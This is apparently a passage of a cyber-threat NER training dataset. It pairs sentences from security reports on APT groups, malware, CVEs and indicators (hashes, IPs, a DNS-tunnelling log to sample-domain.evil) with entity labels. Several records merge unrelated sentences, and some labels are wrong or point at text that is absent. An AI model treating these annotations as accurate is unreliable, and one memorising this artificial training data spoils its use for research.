There was a significant increase in SectorJ04's hacking activities in 2019 , especially those targeting South Korea . A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group .", "spans": {"SYSTEM: Play Protect": [[17, 29]], "ORGANIZATION: Google": [[32, 38]], "THREAT_ACTOR: SectorJ04's": [[167, 178]], "VULNERABILITY: zero-day": [[354, 362]], "VULNERABILITY: exploit": [[363, 370]], "THREAT_ACTOR: Gamma Group": [[496, 507]]}, "info": {"id": "cyberner_stix_train_007294", "source": "cyberner_stix_train"}} {"text": "Symantec products block attempts to install Lojax with the detection name Trojan.Lojax .", "spans": {"ORGANIZATION: Symantec": [[0, 8]], "MALWARE: Lojax": [[44, 49]], "FILEPATH: Trojan.Lojax": [[74, 86]]}, "info": {"id": "cyberner_stix_train_007295", "source": "cyberner_stix_train"}} {"text": "CONCLUSION We witness actors continually using open-source platforms , code and packages to create their own software . We were not able to find additional tools , but the attackers again compromised a legitimate Thai website to host their malware , in this case the student portal for a Thai University . APT12 closely monitors online media related to its tools and operations and reacts when its tools are publicly disclosed . 
As we have seen over the years , SocGholish is an established player that has managed to compromise countless victims and deliver ransomware after facilitating the installation of tools like Cobalt Strike or Mimikatz .", "spans": {"THREAT_ACTOR: APT12": [[306, 311]], "TOOL: Cobalt Strike": [[620, 633]], "TOOL: Mimikatz": [[637, 645]]}, "info": {"id": "cyberner_stix_train_007296", "source": "cyberner_stix_train"}} {"text": "The exploit payload contains following file components : Component name Description run_root_shell/arrs_put_user.o/arrs_put_user/poc Exploit ELF db Sqlite3 tool ELF device.db Sqlite3 database with supported devices and their constants needed for privilege escalation ‘ device.db ’ is a database used by the exploit . Unlike the 2016 variants of Ratsnif that stored all packets to a PCAP file . SilverTerrier mainly targets organizations in high technology , higher education , and manufacturing .", "spans": {"THREAT_ACTOR: Ratsnif": [[345, 352]], "THREAT_ACTOR: SilverTerrier": [[394, 407]]}, "info": {"id": "cyberner_stix_train_007297", "source": "cyberner_stix_train"}} {"text": "The relevant strings inside the VAD sections were UTF-16 encoded and revealed additional insights once extracted .", "spans": {"TOOL: VAD": [[32, 35]], "TOOL: UTF-16": [[50, 56]]}, "info": {"id": "cyberner_stix_train_007298", "source": "cyberner_stix_train"}} {"text": "In our opinion , this insistence on using exploits that are already under heightened scrutiny suggests the existence of at least one of three circumstances .", "spans": {}, "info": {"id": "cyberner_stix_train_007299", "source": "cyberner_stix_train"}} {"text": "Desktop banking malware often blocks the user ’ s access to their banking website after a successful transaction by using web injects that show a variety of “ service unavailable ” screens . Ransom demands have varied significantly , suggesting that INDRIK SPIDER likely calculates the ransom amount based on the size and value of the victim organization . 
The group uses an advanced piece of malware known as Remsec ( Backdoor.Remsec ) to conduct its attacks .", "spans": {"THREAT_ACTOR: INDRIK SPIDER": [[250, 263]], "MALWARE: Remsec": [[410, 416]], "MALWARE: Backdoor.Remsec": [[419, 434]]}, "info": {"id": "cyberner_stix_train_007300", "source": "cyberner_stix_train"}} {"text": "The APT actor , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors . By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country .", "spans": {"THREAT_ACTOR: APT actor": [[4, 13]], "ORGANIZATION: financial services": [[81, 99]], "ORGANIZATION: telecoms": [[102, 110]], "ORGANIZATION: government": [[113, 123]], "ORGANIZATION: defense sectors": [[130, 145]], "MALWARE: GozNym": [[170, 176]], "ORGANIZATION: banks": [[220, 225]], "ORGANIZATION: community banks": [[317, 332]], "ORGANIZATION: email service providers": [[337, 360]]}, "info": {"id": "cyberner_stix_train_007301", "source": "cyberner_stix_train"}} {"text": "The first variant is a “ first stage application , ” that performs basic profiling of a device , and under certain conditions attempts to download and install a much more comprehensive surveillanceware component , which is the second variant . All of these early WhiteBear targets were related to embassies and diplomatic/foreign affair organizations . ZxShell exploits this fact by cycling between each of the names , verifying the existence of the real service . 
Sometimes this was a high profile , legitimate site such as ‘ diplomacy.pl ’ hosting a ZIP archive .", "spans": {"TOOL: WhiteBear": [[263, 272]], "ORGANIZATION: embassies": [[297, 306]], "MALWARE: ZxShell": [[353, 360]]}, "info": {"id": "cyberner_stix_train_007302", "source": "cyberner_stix_train"}} {"text": "Over the past two years , Russia appears to have increasingly leveraged APT28 to conduct information operations commensurate with broader strategic military doctrine .", "spans": {"THREAT_ACTOR: APT28": [[72, 77]]}, "info": {"id": "cyberner_stix_train_007303", "source": "cyberner_stix_train"}} {"text": "At least in most recent versions , as of January 2019 , the Zip archive would actually contain the i686 , arm and arm64 versions of all deployed binaries . In the first week of May 2016 , FireEye 's DTI identified a wave of emails containing malicious attachments being sent to multiple banks in the Middle East region . This campaign started in November 2019 and it is still ongoing . According to Kaspersky telemetry , targeted organizations included political bodies in Europe .", "spans": {"ORGANIZATION: FireEye 's DTI": [[188, 202]], "MALWARE: malicious attachments": [[242, 263]], "ORGANIZATION: banks": [[287, 292]], "ORGANIZATION: Kaspersky": [[399, 408]], "ORGANIZATION: political bodies": [[453, 469]]}, "info": {"id": "cyberner_stix_train_007304", "source": "cyberner_stix_train"}} {"text": "It doesn’t have an encryption/decryption routine for network communication .", "spans": {}, "info": {"id": "cyberner_stix_train_007305", "source": "cyberner_stix_train"}} {"text": "Stage 1 : Loader malware keeps sandbox and debuggers away The first stage of FinFisher running through this complicated virtual machine is a loader malware designed to probe the system and determine whether it ’ s running in a sandbox environment ( typical for cloud-based detonation solution like Office 365 ATP ) . 
One payload was a Python based open source remote administration tool ( RAT ) called Pupy . Winnti : 4256fa6f6a39add6a1fa10ef1497a74088f12be0 2018-07-25 10:13:41 None . According to Kaspersky telemetry , targeted organizations included political bodies in Europe .", "spans": {"MALWARE: FinFisher": [[77, 86]], "SYSTEM: Office 365 ATP": [[298, 312]], "TOOL: RAT": [[389, 392]], "TOOL: Pupy": [[402, 406]], "THREAT_ACTOR: Winnti": [[409, 415]], "FILEPATH: 4256fa6f6a39add6a1fa10ef1497a74088f12be0": [[418, 458]], "ORGANIZATION: Kaspersky": [[499, 508]], "ORGANIZATION: political bodies": [[553, 569]]}, "info": {"id": "cyberner_stix_train_007306", "source": "cyberner_stix_train"}} {"text": ") Calculate the difference between this pointer and the User32 base address . While the recent paper from Trend Micro and ClearSky ( ' The Spy Kittens Are Back : Rocket Kitten 2 ' ) does extensively cover the campaign 's narrative , we aimed to seek confirmation that our analyzed attack was positively connected to the same campaign and set out to provide additional value and insight . After resolving the APIs , the shellcode will decrypt the launcher binary and load it to the memory . 
None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": {"ORGANIZATION: Trend Micro": [[106, 117]], "ORGANIZATION: ClearSky": [[122, 130]], "THREAT_ACTOR: Spy Kittens": [[139, 150]], "THREAT_ACTOR: Rocket Kitten": [[162, 175]], "TOOL: APIs": [[408, 412]], "ORGANIZATION: Microsoft Exchange server": [[640, 665]]}, "info": {"id": "cyberner_stix_train_007307", "source": "cyberner_stix_train"}} {"text": "For example , one commercial obfuscator , which cost €350 , was used for Trojans and Opfak.bo Obad.a Android vulnerabilities are used by criminals for three reasons : to bypass the code integrity check when installing an application ( vulnerability Master Key ) ; to enhance the rights of malicious applications , considerably extending their capabilities ; and to make it more difficult to remove malware . No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" — a near-year-old Java security hole — \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported . The encrypted payload is located in the .rdata section of hpqhvsei.dll and the decryption algorithm is an XOR loop where the XOR key is updated at each iteration . 
WithSecure has identified instances where the malware was delivered to victims through LinkedIn .", "spans": {"MALWARE: Opfak.bo Obad.a": [[85, 100]], "VULNERABILITY: zero-day vulnerabilities": [[411, 435]], "VULNERABILITY: CVE-2011-3544": [[532, 545]], "VULNERABILITY: CVE-2010-0738": [[593, 606]], "ORGANIZATION: Dell SecureWorks'": [[639, 656]], "FILEPATH: hpqhvsei.dll": [[738, 750]], "ORGANIZATION: WithSecure": [[844, 854]], "MALWARE: malware": [[890, 897]], "TOOL: LinkedIn": [[931, 939]]}, "info": {"id": "cyberner_stix_train_007308", "source": "cyberner_stix_train"}} {"text": "In addition , end users can also benefit from security solutions such as Trend Micro Home Security for Mac , which provides comprehensive security and multi-device protection against viruses , ransomware , malicious websites , and identity thieves .", "spans": {"ORGANIZATION: Trend Micro Home Security": [[73, 98]], "SYSTEM: Mac": [[103, 106]], "MALWARE: viruses": [[183, 190]], "MALWARE: ransomware": [[193, 203]], "MALWARE: malicious websites": [[206, 224]], "MALWARE: identity thieves": [[231, 247]]}, "info": {"id": "cyberner_stix_train_007309", "source": "cyberner_stix_train"}} {"text": "In one sample analyzed by CTU researchers , PlugX was configured with hard-coded user credentials to bypass a proxy that required authentication .", "spans": {"ORGANIZATION: CTU": [[26, 29]], "MALWARE: PlugX": [[44, 49]]}, "info": {"id": "cyberner_stix_train_007310", "source": "cyberner_stix_train"}} {"text": "PINCHY SPIDER is the criminal group behind the development of the ransomware most commonly known as GandCrab , which has been active since January 2018 . 
Butterfly has attacked multi-billion dollar companies operating in the internet , IT software , pharmaceutical , and commodities sectors .", "spans": {"THREAT_ACTOR: PINCHY SPIDER": [[0, 13]], "TOOL: GandCrab": [[100, 108]], "THREAT_ACTOR: Butterfly": [[154, 163]], "ORGANIZATION: multi-billion dollar companies": [[177, 207]], "ORGANIZATION: pharmaceutical": [[250, 264]], "ORGANIZATION: commodities sectors": [[271, 290]]}, "info": {"id": "cyberner_stix_train_007311", "source": "cyberner_stix_train"}} {"text": "The threat actor’s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users . The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars .", "spans": {"THREAT_ACTOR: actor’s": [[11, 18]], "MALWARE: malicious payload": [[72, 89]], "ORGANIZATION: users": [[154, 159]], "FILEPATH: Seminar-Invitation.doc": [[202, 224]], "TOOL: Microsoft Word": [[248, 262]], "MALWARE: ThreeDollars": [[284, 296]]}, "info": {"id": "cyberner_stix_train_007312", "source": "cyberner_stix_train"}} {"text": "For alerts raised either by specific threat intelligence tied to activity groups or by more generic suspicious behaviors , Windows Defender ATP provides rich , visualized technical context .", "spans": {"TOOL: Windows Defender ATP": [[123, 143]]}, "info": {"id": "cyberner_stix_train_007313", "source": "cyberner_stix_train"}} {"text": "As a curiosity , most PinchDuke samples contain a Russian language error message : “ There is an error in the module ’s name ! The length of the data section name must be 4 bytes ” .", "spans": {"MALWARE: PinchDuke": [[22, 31]]}, "info": {"id": "cyberner_stix_train_007314", "source": "cyberner_stix_train"}} {"text": "] 122:28833 61 [ . 
This neatly ties together many of the tools used by the Dukes group , as versions of this one loader have been used to load malware from three different Dukes-related toolsets CosmicDuke , PinchDuke , and MiniDuke – over the course of five years . This approach has also been used in different Empire modules . The July 2023 campaign has a slightly modified infection chain .", "spans": {"THREAT_ACTOR: Dukes group": [[75, 86]], "TOOL: CosmicDuke": [[195, 205]], "TOOL: PinchDuke": [[208, 217]], "TOOL: MiniDuke": [[224, 232]], "TOOL: Empire": [[313, 319]]}, "info": {"id": "cyberner_stix_train_007315", "source": "cyberner_stix_train"}} {"text": "We are constantly on the lookout for new threats and we are expanding our protections . Syncopate is a well-known Russian company that is best known as the developer and operator of the ' GameNet ' platform . Using host-based digital forensic analysis , CTU analysts observed the intruders using the native ‘ at.exe ’ Windows task scheduler tool to move laterally within the infrastructure . The web page “ about.htm ” implements an exploit for Microsoft Internet Explorer 8 .", "spans": {"ORGANIZATION: company": [[122, 129]], "ORGANIZATION: CTU": [[254, 257]], "FILEPATH: at.exe": [[309, 315]], "SYSTEM: Windows": [[318, 325]], "SYSTEM: Microsoft Internet Explorer 8": [[445, 474]]}, "info": {"id": "cyberner_stix_train_007316", "source": "cyberner_stix_train"}} {"text": "This , in turn , would provide access to a larger amount of intellectual property and sensitive data . During this time , the attacker must ensure continued access to the target environment or risk losing years of effort and potentially expensive custom ICS malware .", "spans": {"MALWARE: ICS": [[254, 257]], "MALWARE: malware": [[258, 265]]}, "info": {"id": "cyberner_stix_train_007317", "source": "cyberner_stix_train"}} {"text": "All of the PHAs that are mentioned in this blog post were detected and removed by Google Play Protect . 
To control the full operation , MoneyTaker uses a Pentest framework Server . This demonstrates that the threat actors understand conventional Japanese date notation . We observed that in at least two cases , the threat actors subsequently issued the following command against the Exchange web server : This command attempts to delete the administrator user from the Exchange Organizations administrators group , beginning with the Domain Controller in the current domain .", "spans": {"SYSTEM: Google Play Protect": [[82, 101]], "THREAT_ACTOR: MoneyTaker": [[136, 146]], "TOOL: Pentest framework Server": [[154, 178]], "SYSTEM: Exchange web server": [[384, 403]]}, "info": {"id": "cyberner_stix_train_007318", "source": "cyberner_stix_train"}} {"text": "Notably , after the first SMB packet sent to the victim 's IP address , WannaCry sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5 . More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service .", "spans": {"TOOL: WannaCry": [[72, 80]], "FILEPATH: TajMahal": [[214, 222]], "ORGANIZATION: Kaspersky": [[257, 266]]}, "info": {"id": "cyberner_stix_train_007319", "source": "cyberner_stix_train"}} {"text": "Once the Trojan establishes the server ’s authenticity , it expects a variable-size block of binary code that is read from the server straight into the virtual space for iexplore.exe and then executed .", "spans": {"MALWARE: Trojan": [[9, 15]], "FILEPATH: iexplore.exe": [[170, 182]]}, "info": {"id": "cyberner_stix_train_007320", "source": "cyberner_stix_train"}} {"text": "] 87:28855 61 [ . As researchers continued discovering new toolsets that were created and used by the same group that had been operating MiniDuke , and thus the threat actor operating the toolsets started to be commonly referred to as \" Dukes \" . 
This request is then stored in the CommonApplicationData directory ( C:\\ProgramData in Vista and later ) as the hard coded file name ( highlighted in green ) . The use of 3AM was only partially successful .", "spans": {"THREAT_ACTOR: group": [[107, 112]], "TOOL: MiniDuke": [[137, 145]], "THREAT_ACTOR: threat actor": [[161, 173]], "THREAT_ACTOR: Dukes": [[237, 242]], "MALWARE: 3AM": [[418, 421]]}, "info": {"id": "cyberner_stix_train_007321", "source": "cyberner_stix_train"}} {"text": "] jp/佐川急便.apk hxxp : //mailsa-qae [ . In October 2014 , FireEye released APT28 : A Window into Russia 's Cyber Espionage Operations , and characterized APT28 's activity as aligning with the Russian Government 's strategic intelligence requirements . Once an A record response is received by the malware containing 253.25.42.87 , several variables are set in preparation to exit the send . Currently , Mandiant can neither validate claims related to Zarya ’s hacking capabilities , nor those related to the group ’s potential links to the FSB .", "spans": {"ORGANIZATION: FireEye": [[56, 63]], "THREAT_ACTOR: APT28": [[73, 78], [152, 157]], "IP_ADDRESS: 253.25.42.87": [[315, 327]], "ORGANIZATION: Mandiant": [[402, 410]], "ORGANIZATION: FSB": [[539, 542]]}, "info": {"id": "cyberner_stix_train_007322", "source": "cyberner_stix_train"}} {"text": "The FakeSpy malware has been found to masquerade as any of the following companies : United States Postal Service - An independent agency of the executive branch of the United States federal government . FireEye also noted in their 2017 report that the online handle xman_1365_x , ” found within the PDB path in an APT33 TURNEDUP backdoor sample , belonged to an individual at the Nasr Institute . 
However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": {"MALWARE: FakeSpy": [[4, 11]], "ORGANIZATION: United States Postal Service": [[85, 113]], "ORGANIZATION: FireEye": [[204, 211]], "THREAT_ACTOR: APT33": [[315, 320]], "ORGANIZATION: CSIS": [[448, 452]], "MALWARE: Carbanak": [[486, 494]], "ORGANIZATION: customers": [[524, 533]]}, "info": {"id": "cyberner_stix_train_007323", "source": "cyberner_stix_train"}} {"text": "As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . Emissary Panda is still active and continues to target selected organisations .", "spans": {"MALWARE: malicious documents": [[29, 48]], "VULNERABILITY: CVE-2017-0199": [[60, 73]], "TOOL: LATENTBOT malware": [[99, 116]]}, "info": {"id": "cyberner_stix_train_007324", "source": "cyberner_stix_train"}} {"text": "With the capability to open a given URL in a browser , the actor behind ‘ SimBad ’ can generate phishing pages for multiple platforms and open them in a browser , thus performing spear-phishing attacks on the user . Sometimes , they aim at establishing a foothold on the target 's computer to gain access into their organization , but , based on our data , this is usually not their main objective , as opposed to other Iranian threat groups , such as OilRig and CopyKittens . While we know the attackers used a custom dropper to install the back door , we do not know the delivery vector .", "spans": {"MALWARE: SimBad": [[74, 80]], "THREAT_ACTOR: threat groups": [[428, 441]], "THREAT_ACTOR: OilRig": [[452, 458]], "THREAT_ACTOR: CopyKittens": [[463, 474]], "MALWARE: custom dropper": [[512, 526]]}, "info": {"id": "cyberner_stix_train_007325", "source": "cyberner_stix_train"}} {"text": "On later versions , specifically iOS 12.1.1 and iOS 12.2 , the process is different . 
Between November 26 , 2015 , and December 1 , 2015 , known and suspected China-based APT groups launched several spear phishing attacks targeting Japanese and Taiwanese organizations in the high-tech , government services , media and financial services industries . This response tells the malware to set a variable for the file name to receivebox\\rcvd10100 and set the next query action to D in order to request the next chunk of . The site also claimed to include the names , addresses and phone numbers of top CEOs .", "spans": {"SYSTEM: iOS 12.1.1": [[33, 43]], "SYSTEM: iOS 12.2": [[48, 56]], "THREAT_ACTOR: APT groups": [[171, 181]], "ORGANIZATION: high-tech": [[276, 285]], "ORGANIZATION: government services": [[288, 307]], "ORGANIZATION: media": [[310, 315]], "ORGANIZATION: financial services industries": [[320, 349]], "FILEPATH: receivebox\\rcvd10100": [[423, 443]], "THREAT_ACTOR: The site also claimed to include the names , addresses and phone numbers of top CEOs": [[519, 603]]}, "info": {"id": "cyberner_stix_train_007326", "source": "cyberner_stix_train"}} {"text": "As a result , these organizations are often exposed to increased government-directed threats aimed at monitoring their activities , discrediting their work , or stealing their intellectual property .", "spans": {}, "info": {"id": "cyberner_stix_train_007327", "source": "cyberner_stix_train"}} {"text": "EventBot appears to be a completely new malware in the early stages of development , giving us an interesting view into how attackers create and test their malware . Some hackers even went onto use the Cisco exploits in the wild . 
APT10 has been in operation since at least 2009 , and has evolved its targeting from an early focus on the US defence industrial base ( DIB ) and the technology and telecommunications sector , to a widespread compromise of multiple industries and sectors across the globe , most recently with a focus on MSPs .", "spans": {"MALWARE: EventBot": [[0, 8]], "VULNERABILITY: Cisco exploits": [[202, 216]], "THREAT_ACTOR: APT10": [[231, 236]], "ORGANIZATION: technology": [[381, 391]], "ORGANIZATION: telecommunications sector": [[396, 421]], "ORGANIZATION: MSPs": [[535, 539]]}, "info": {"id": "cyberner_stix_train_007328", "source": "cyberner_stix_train"}} {"text": "The exploit uses CVE-2015-1701 to execute a callback in userspace .", "spans": {"VULNERABILITY: CVE-2015-1701": [[17, 30]]}, "info": {"id": "cyberner_stix_train_007329", "source": "cyberner_stix_train"}} {"text": "] com/gate_cb8a5aea1ab302f0_c offline 31.214.157 [ . The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . 
To sum up , the HBO hacker - Behzad Mesri is a member of Turk Black Hat along with ArYaIeIrAn , who provides infrastructure for Charming Kitten activity via PersianDNS / Mahanserver together with Mohammad Rasoul Akbari , who is a Facebook friend of Behzad Mesri 's .", "spans": {"MALWARE: KopiLuwak": [[74, 83]], "THREAT_ACTOR: hacker": [[223, 229]], "THREAT_ACTOR: Behzad Mesri": [[232, 244], [452, 464]], "THREAT_ACTOR: Turk Black Hat": [[260, 274]], "THREAT_ACTOR: ArYaIeIrAn": [[286, 296]], "MALWARE: PersianDNS": [[360, 370]], "MALWARE: Mahanserver": [[373, 384]], "ORGANIZATION: Facebook": [[433, 441]]}, "info": {"id": "cyberner_stix_train_007330", "source": "cyberner_stix_train"}} {"text": "Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza.r23 :", "spans": {"FILEPATH: Hanieh_will_remain_abroad_and_Hamas_steps_up_in_Gaza.r23": [[0, 56]]}, "info": {"id": "cyberner_stix_train_007331", "source": "cyberner_stix_train"}} {"text": "Later , in January 2018 , a report was released that identified similarities between the BitPaymer ransomware and Dridex malware . But before the ScarCruft infection , however , another APT group also targeted this victim with the host being infected with GreezeBackdoor on March 26 , 2018 .", "spans": {"TOOL: BitPaymer ransomware": [[89, 109]], "TOOL: Dridex malware": [[114, 128]], "THREAT_ACTOR: ScarCruft": [[146, 155]]}, "info": {"id": "cyberner_stix_train_007332", "source": "cyberner_stix_train"}} {"text": "According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . 
These spear phishing emails were crafted to appear highly convincing , including being sent from legitimate email accounts suspected to have been previously compromised by the Callisto Group via credential phishing .", "spans": {"ORGANIZATION: FireEye": [[13, 20]], "THREAT_ACTOR: admin@338": [[27, 36]], "VULNERABILITY: Microsoft Office vulnerabilities": [[104, 136]], "TOOL: LOWBALL": [[187, 194]], "TOOL: emails": [[218, 224]], "TOOL: email": [[305, 310]]}, "info": {"id": "cyberner_stix_train_007333", "source": "cyberner_stix_train"}} {"text": "Cannon acknowledges the successful move by sending an email to sahro.bella7@post.cz with l.txt ( contains 090 string ) as the attachment , ok4 within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": {"MALWARE: Cannon": [[0, 6]], "TOOL: email": [[54, 59]], "EMAIL: sahro.bella7@post.cz": [[63, 83]], "FILEPATH: l.txt": [[89, 94]]}, "info": {"id": "cyberner_stix_train_007334", "source": "cyberner_stix_train"}} {"text": "The classes.dex has implementation for only two classes : The main application class gCHotRrgEruDv , which is involved when the application opens A helper class that has definition for custom encryption and decryption This means that there ’ s no code corresponding to the services declared in the manifest file : Main Activity , Broadcast Receivers , and Background . The MyWeb sample that FireEye analyzed has a compile date of 1/20/2011 . The message claimed to be from an Export Operation Specialist of USCO Logistics and that it was sent as per their customer . 
Collect NSPPE core dump files from NetScaler .", "spans": {"TOOL: MyWeb sample": [[373, 385]], "ORGANIZATION: FireEye": [[391, 398]], "ORGANIZATION: USCO Logistics": [[507, 521]]}, "info": {"id": "cyberner_stix_train_007335", "source": "cyberner_stix_train"}} {"text": "Packing the payloads with the Enigma packer .", "spans": {"TOOL: Enigma": [[30, 36]]}, "info": {"id": "cyberner_stix_train_007336", "source": "cyberner_stix_train"}} {"text": "Application launch When launching for the first time , the Trojan checks if it is being launched in an emulation environment , and in which country it is being launched . Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document . In November 2017 , SecureWorks Counter Threat Unit ( CTU ) researchers investigated a widespread and opportunistic WCry ransomware campaign that impacted many systems around the world .", "spans": {"MALWARE: Attachments": [[171, 182]], "ORGANIZATION: SecureWorks Counter Threat Unit": [[321, 352]], "ORGANIZATION: CTU": [[355, 358]]}, "info": {"id": "cyberner_stix_train_007337", "source": "cyberner_stix_train"}} {"text": "Phone data ( phone number , OS version , phone model , SDK version ) . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . 
Meanwhile , NEODYMIUM used well-tailored spear-phishing emails with attachments that delivered the exploit code , ultimately leading to Wingbird 's installation on victim computers .", "spans": {"MALWARE: Microsoft Word attachment": [[151, 176]], "VULNERABILITY: CVE-2017-0199": [[209, 222]], "TOOL: ZeroT Trojan": [[237, 249]], "TOOL: PlugX Remote Access Trojan": [[281, 307]], "TOOL: RAT": [[310, 313]], "THREAT_ACTOR: NEODYMIUM": [[330, 339]], "TOOL: emails": [[374, 380]], "VULNERABILITY: exploit": [[417, 424]], "MALWARE: Wingbird": [[454, 462]]}, "info": {"id": "cyberner_stix_train_007338", "source": "cyberner_stix_train"}} {"text": "The core malware is usually disguised as Google Updater , Google Update for U or “ com.google.vending ” . We believe that Bookworm samples use the static date string as campaign codes , which we used to determine the approximate date of each attack that we did not have detailed targeting information . The Dexphot attack used a variety of sophisticated methods to evade security solutions . During the SolarWinds Compromise , APT29 registered devices in order to enable mailbox syncing via the Set - CASMailbox command . .006", "spans": {"ORGANIZATION: Google": [[41, 47], [58, 64]], "TOOL: Bookworm samples": [[122, 138]], "MALWARE: Dexphot": [[307, 314]], "THREAT_ACTOR: SolarWinds Compromise": [[403, 424]], "THREAT_ACTOR: APT29": [[427, 432]]}, "info": {"id": "cyberner_stix_train_007339", "source": "cyberner_stix_train"}} {"text": "When before it had used several different social media platforms , it now uses the Twitter platform , something FakeSpy has done in its past attacks . APT28 malware , in particular the family of modular backdoors that we call CHOPSTICK , indicates a formal code development environment . 
Query: 00039e9650eca66C06T.sample-domain.evil , Response: 24.125.10.140 , File name: 10140, Query: 139e965e000ca6D2C80T.sample-domain.evil , Response: 110.101.116.0 , Query: 00339e965e1ca6EF4C07T.sample-domain.evil , Response: 32.117.115.3 , Query: 30069e 1965eca6FE8C13T.sample-domain.evil, Response: 101.114.32.6 , Query: 391 e960095eca63570BC62T.sample-domain.evil , Response: 1.2.3.0 . The arrest makes him the third LockBit affiliate charged in the US since November .", "spans": {"ORGANIZATION: Twitter": [[83, 90]], "MALWARE: FakeSpy": [[112, 119]], "TOOL: APT28 malware": [[151, 164]], "TOOL: CHOPSTICK": [[226, 235]], "FILEPATH: 00039e9650eca66C06T.sample-domain.evil": [[295, 333]], "IP_ADDRESS: 24.125.10.140": [[346, 359]], "FILEPATH: 139e965e000ca6D2C80T.sample-domain.evil": [[387, 426]], "IP_ADDRESS: 110.101.116.0": [[439, 452]], "FILEPATH: 00339e965e1ca6EF4C07T.sample-domain.evil": [[462, 502]], "IP_ADDRESS: 32.117.115.3": [[515, 527]], "IP_ADDRESS: 101.114.32.6": [[590, 602]], "FILEPATH: 391 e960095eca63570BC62T.sample-domain.evil": [[612, 655]], "IP_ADDRESS: 1.2.3.0": [[668, 675]], "THREAT_ACTOR: LockBit": [[709, 716]]}, "info": {"id": "cyberner_stix_train_007340", "source": "cyberner_stix_train"}} {"text": "Record phone calls audio in 3gp format . Once gaining a foothold on a user 's system , the threat actors behind STOLEN PENCIL use Microsoft 's Remote Desktop Protocol ( RDP ) for remote point-and-click access . This campaign uses social engineering and decoy documents related to geopolitical affairs and relations between the Palestinian government , and references Egypt , Hezbollah , and Iran . 
As with other groups , it is possible that espionage and intelligence gathering are the first steps toward deploying ransomware or wiper malware .", "spans": {"ORGANIZATION: Microsoft": [[130, 139]], "TOOL: Remote Desktop Protocol": [[143, 166]], "TOOL: RDP": [[169, 172]], "ORGANIZATION: Palestinian government": [[327, 349]]}, "info": {"id": "cyberner_stix_train_007341", "source": "cyberner_stix_train"}} {"text": "One of the C2 locations for the new payload , 87.236.215.246 , also hosts a suspected APT28 domain ssl-icloud.com .", "spans": {"TOOL: C2": [[11, 13]], "IP_ADDRESS: 87.236.215.246": [[46, 60]], "THREAT_ACTOR: APT28": [[86, 91]], "DOMAIN: ssl-icloud.com": [[99, 113]]}, "info": {"id": "cyberner_stix_train_007342", "source": "cyberner_stix_train"}} {"text": "\" Users must realize that they can no longer trust in installing only apps with a high reputation from official app stores as their sole defense , '' the researchers wrote in an e-mail to Ars . The IndiaBravo-PapaAlfa installer is responsible for installing the service DLL variant . We continue to monitor the activities of both groups closely . Cisco Secure Endpoint ( formerly AMP for Endpoints ) is ideally suited to prevent the execution of the malware detailed in this post .", "spans": {"ORGANIZATION: Ars": [[188, 191]], "TOOL: IndiaBravo-PapaAlfa installer": [[198, 227]], "TOOL: Cisco Secure Endpoint": [[347, 368]], "TOOL: AMP for Endpoints": [[380, 397]]}, "info": {"id": "cyberner_stix_train_007343", "source": "cyberner_stix_train"}} {"text": "Figure 26 : “ Agent Smith ” Campaign timeline Greater “ Agent Smith ” Campaign Discovery Orchestrating a successful 9Apps centric malware campaign , the actor behind “ Agent Smith ” established solid strategies in malware proliferation and payload delivery . 
We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover . Dexphot : 537d7fe3b426827e40bbdd1d127ddb59effe1e9b3c160804df8922f92e0b366e . To me , simply asking critical infrastructure to consider these factors as part of their normal processes seems like a non - issue , but the U.S. Appeals Court has put a hold on this rule for the time being ( though it did n’t give a precise reason at the time of its ruling ) .", "spans": {"MALWARE: Agent Smith": [[14, 25], [56, 67], [168, 179]], "SYSTEM: 9Apps": [[116, 121]], "TOOL: SNEEPY/BYEBYESHELL": [[406, 424]], "MALWARE: CONFUCIUS_B": [[433, 444]], "TOOL: Hangover": [[466, 474]], "MALWARE: Dexphot": [[477, 484]], "FILEPATH: 537d7fe3b426827e40bbdd1d127ddb59effe1e9b3c160804df8922f92e0b366e": [[487, 551]], "ORGANIZATION: critical infrastructure": [[576, 599]], "ORGANIZATION: U.S. Appeals Court": [[695, 713]]}, "info": {"id": "cyberner_stix_train_007344", "source": "cyberner_stix_train"}} {"text": "To run its code in kernel mode in the most recent versions of operating systems , that have Driver Signature Enforcement , Slingshot loads signed vulnerable drivers and runs its own code through their vulnerabilities . 
